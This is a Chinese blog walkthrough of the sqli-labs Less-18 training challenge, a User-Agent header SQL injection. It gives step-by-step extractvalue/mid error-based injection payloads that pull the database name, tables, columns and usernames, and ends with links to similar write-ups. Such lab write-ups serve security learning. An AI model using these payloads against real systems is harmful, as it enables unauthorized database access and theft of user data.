【网络安全】sqli-labs Less-18 解题详析

原创 已于 2025-03-31 11:01:30 修改 · 4k 阅读 · 2 ·
CC 4.0 BY-SA版权
原创文章,禁止转载,否则保留追究法律责任的权利。
文章标签:

#web安全 #数据库 #sqlilabs #sql

于 2023-07-29 17:46:57 首次发布
本文详细解析了SQLi-Labs Less-18挑战的解题过程,通过构造特定的SQL注入POC,利用extractvalue和mid函数,成功获取了数据库名称、表名、列名及数据,展示了报错注入技巧。

文章目录

正文

该题为基于GET及报错的User-Agent注入,故需在参数后构造POC

报错注入的原理及攻击姿势可参考: 【网络安全】sqli-labs Less-5 解题详析

该题采用抓包进行处理

判断注入类型

在这里插入图片描述
由回显可知,注入类型为('注入

故注入模板为',1,1)#

查库名

',extractvalue(1,concat(0x23,database())),1)#

得到库名为security

查表名

我们以第一个1为注入点,构造POC如下:

',extractvalue(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security'))),1)#

在这里插入图片描述

得到四个表名

查列名

',extractvalue(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))),1)#

在这里插入图片描述

查数据

这里先介绍一下mid()函数,mid()函数是一种字符串函数,用于提取给定字符串的子字符串。它的语法如下:

MID(str, start, length)

其中:

  • str 是要提取子字符串的源字符串。
  • start 指定了子字符串的起始位置。它是一个整数值,表示从源字符串中的哪个字符开始提取子字符串。起始位置是从 1 开始计数的。
  • length 指定了要提取的子字符串的长度。它也是一个整数值,表示从起始位置开始向后提取多少个字符。

例如,假设有一个字符串 "Hello, World!",如果想要提取其中的子字符串 "World",可以使用以下 MID() 函数调用:

MID("Hello,World!", 7, 5)

在这个例子中,str 是字符串 "Hello, World!"start 是 7,length 是 5。因此,MID() 函数将从第 7 个字符开始提取长度为 5 的子字符串,结果为 "World"

我们以username列为例,利用mid()函数构造POC如下:

',extractvalue(1,concat(0x23,mid((select group_concat(username) from security.users),1,32))),1)#

在这里插入图片描述
这个语句是从 security.users 表中的 username 列中获取用户名,获取到的并不是全部的用户名,而是从第一个字符开始的长度为 32 的子字符串

接着,我们提取从第 32 个字符开始的长度为 32 的子字符串:

POC如下:

',extractvalue(1,concat(0x23,mid((select group_concat(username) from security.users),32,32))),1)#'

在这里插入图片描述
同理,32改为64后得到:

在这里插入图片描述

Sqli-labs靶场第18解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1987
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
sqli-lab-less18
Sa1nZen的博客
08-05 257
sqli-lab-less18
Sqli-labsLess-18Less-19
→_→
04-12 4388
Less-18 基于错误的用户代理,头部POST注入 (注:这一个模拟的场景是注册登录后的注入) 由题意可知,这又是一种新姿势,老方法,查找注入点,发现前面的方法都未成功。且错误回显与正确回显都显示IP: 这里写说几个常用请求头:(上一篇文章细讲过) Host ...
Sqli-labs Less18-Less23 HTTP头
beiweixiaotian66的博客
07-25 892
一丢丢Sqli-labs小练习
SQLi LABS Less-18 报错注入
热门推荐
wangyuxiang946的博客
06-22 1万+
第十八关请求方式为 GET请求 , 注入点为User-Agent , 注入方式为 错误注入 第一步,判断注入方式 先看源码 后台代码对 特殊字符进行了过滤 , 常规的注入方式行不通 , 只有通过代码审计来判断注入方式 登录成功后 , 有一个保存用户主机信息的SQL语句 , 并且没有对参数进行过滤 , 我们可以针对这个SQL进行错误注入 真实场景中 , 我们可以先注册一个账号进行登录 , 登录成功后通过User-Agent 进行错误注入 , 从而实现脱库 使用 Burp...
sqli-labs(less-18)
m0_64849639的博客
08-02 1102
less-18关于uagent注入
sqli-labs (less-18)
kukudeshuo的博客
03-11 1328
sqli-labs (less-18) 进入18关,输入用户名和密码以后,我们发现屏幕上回显了我们的IP地址和我们的User Agent 用hackbar抓取POST包,在用户名和密码的位置判断注入点,这里我试了很久,发现用户名和密码的位置都是没有注入点的,那是不是代表这关不存在SQL注入漏洞呢,我们注意到一个特点,页面回显了我们的User Agent,所以我们猜想可能注入点在User Agent这里 想抓取到User Agent,可以利用火狐插件或者使用burpsuite抓包,这里演示利用burpsui
精选资源
网络安全 - Web 安全靶场 - sqli-labs-php7.zip
10-13
该资源包来源于GitHub上的一个开源项目,由专业的网络安全爱好者或开发者维护和更新。通过sqli-labs-php7.zip,用户可以搭建一个模拟的SQL注入环境,从而在不危害真实系统的前提下,进行各种SQL注入攻击和防御的练习...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master.zip
01-18
Sqli-labs是一个在线的SQL注入练习平台,提供了一系列关卡供用户练习SQL注入的技巧和防范方法。在这个平台上,用户可以尝试...Sqli-labs旨在帮助网络安全专业人员提高技能和意识,以便更好地应对现实世界中的网络攻击。
sqli-labs-master 靶场环境
最新发布
08-30
sqli-labs-master 靶场环境
sqli-labs Less-18
qq_42630215的博客
05-04 944
LESS-18 POST - Header Injection -Uagent field - Error based 0x01. 随便测试几个查看有无回显 错误回显和正确回显都是显示IP地址 错误回显: 正确回显: 在正确的回显中可以看见user agent,猜测可以利用进行注入,可以查看源码进行分。 用户名与密码的获取方式是post,而且采用了check_input处理,所以在这两个地...
sqli-labs/Less-18
m0_71299382的博客
11-18 243
sqli-labs/第十八关
sqli-labs less18
qq_45106794的博客
10-24 478
sqli-labs less 18 reader-l ‘or updatexml(1,concat(’#’,(select user()),1),1) 先用这句话简单的判断后台insert 语句 insert="INSERTINTOsecurity.uagents(uagent,ipaddress,username)VALUES(′insert="INSERT INTO security.uage...
sqli- labs - Less 18
m0_62102000的博客
08-11 300
sqli- labs - Less 18
sqli-labs ————less -18
Fly_鹏程万里
05-12 3950
Less-18源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&gt..
sqli-labs (less18-less19)
Xi4or0uji
08-01 1856
less 18 头部注入:user_agent 这里不补充http头的知识了,直接看源码可以看到,uname和passwd都有check_input函数检查,所以直接这两个参数注入是不行的了,然后再继续看下去 有句sql语句有ip_address和uagent两个参数,而且前面没有检查,可以考虑注入,但是ip一般是数字,比较麻烦,所以决定用uagent注入 这里给个脚本,其实重点只是s...
sqli-labs:less-18
羽的博客
09-08 259
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; char...
SQLI LABS | Less-18 POST-Header Injection-Uagent field-Error based
Blue17 の 小窝
10-30 856
hackbar插件。针对第一个问题,我们知道 UserAgent 里传递的一般是客户端的浏览器型号,比如使用的是手机浏览器还是 PC 浏览器访问的服务端,以及浏览器的版本信息这些内容。那么第一个问题的答案就很明显了,我首先得成功登录,然后服务端才会收集我 UserAgent 的信息,毕竟,如果任意一个人访问了服务端,服务端都会收集这些信息的话,耗费的资源就太大了。Payload 02 爆出来的结果就比较多了,看样子,它做的很像是。首先,我们需要拿到一个可以使用的用户名和密码,这里笔者使用的是。
[网络安全]sqli-labs Less-1 解题
12-25
SQLi-Labs网络安全领域的一个练习平台,Less-1 是其中一道关于SQL注入攻击的经典题目。在这道题中,你需要利用SQL注入技巧来获取数据库中的敏感信息,通常会涉及HTML表单、GET或POST请求以及对数据库查询构造的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值